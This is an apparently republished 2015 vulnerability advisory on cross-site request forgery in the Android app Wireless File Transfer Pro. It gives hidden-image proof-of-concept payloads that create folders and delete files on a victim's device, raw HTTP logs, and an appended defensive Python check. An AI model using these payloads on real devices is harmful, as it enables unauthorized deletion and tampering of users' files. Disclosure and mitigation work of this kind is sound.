Aerosol

Wireless File Transfer Pro 1.0.1 CSRF

Document Title:
===============
Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Create, Delete)


Release Date:
=============
2015-02-10


Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.


(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium

Request Method(s):
[+] [GET]

Vulnerable Module(s):
[+] browse

Vulnerable Parameter(s):
[+] fileExplorer.html?

Affected Module(s):
[+] Index of Documents (http://localhost:8888)


Technical Details & Description:
================================
A cross-site request forgery vulnerability has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web application.
The mobile web application is vulnerable to a combination of cross-site request forgery and local command injection attacks.



Proof of Concept (PoC):
=======================
Create New Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive





HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">


Delete File, Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---


GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive


HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30





Reference:
http://localhost:8888/

Security Risk:
==============
The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)


Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr

Source
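
Added example (not part of the original advisory or the vendor's code): a server-side check that would reject the forged GET requests shown in the session logs above. The action names are taken from those logs; the "x-csrf-token" header name, the helper names and the sample requests are assumptions constructed for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

# Action names as they appear in the advisory's request logs.
READ_ONLY = {"brower"}
STATE_CHANGING = {"create", "deleteFile"}

def new_csrf_token():
    """Per-session random token, embedded by the server in its own pages."""
    return secrets.token_urlsafe(32)

def authorize(method, target, headers, session_token):
    """Return (allowed, reason) for one request to fileExplorer.html.

    headers: dict with lower-case keys. The "x-csrf-token" header name is
    an assumption of this example, not something the app implements.
    """
    query = parse_qs(urlsplit(target).query)
    action = query.get("action", [""])[0]
    if action in READ_ONLY:
        return True, "read-only action"
    if action not in STATE_CHANGING:
        return False, "unknown action"
    # 1. <img>, <a> and similar tags can only issue GET, so refuse it here.
    if method != "POST":
        return False, "state change requires POST"
    # 2. Origin must be the server's own origin (same host:port as Host).
    origin = urlsplit(headers.get("origin", ""))
    if origin.netloc != headers.get("host"):
        return False, "cross-origin or missing Origin"
    # 3. Token that a page on another site cannot read or guess.
    sent = headers.get("x-csrf-token", "")
    if not hmac.compare_digest(sent.encode(), session_token.encode()):
        return False, "bad CSRF token"
    return True, "ok"

# Constructed sample requests, modelled on the advisory's session logs.
TOKEN = new_csrf_token()
HOST = "192.168.1.2:8888"
forged = authorize("GET", "/fileExplorer.html?action=deleteFile&fileName=test",
                   {"host": HOST}, TOKEN)
legit = authorize("POST", "/fileExplorer.html?action=deleteFile&fileName=test",
                  {"host": HOST, "origin": "http://" + HOST,
                   "x-csrf-token": TOKEN}, TOKEN)
```

Here `forged` is denied because the request is a GET, and `legit` is allowed only because method, Origin and token all match.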
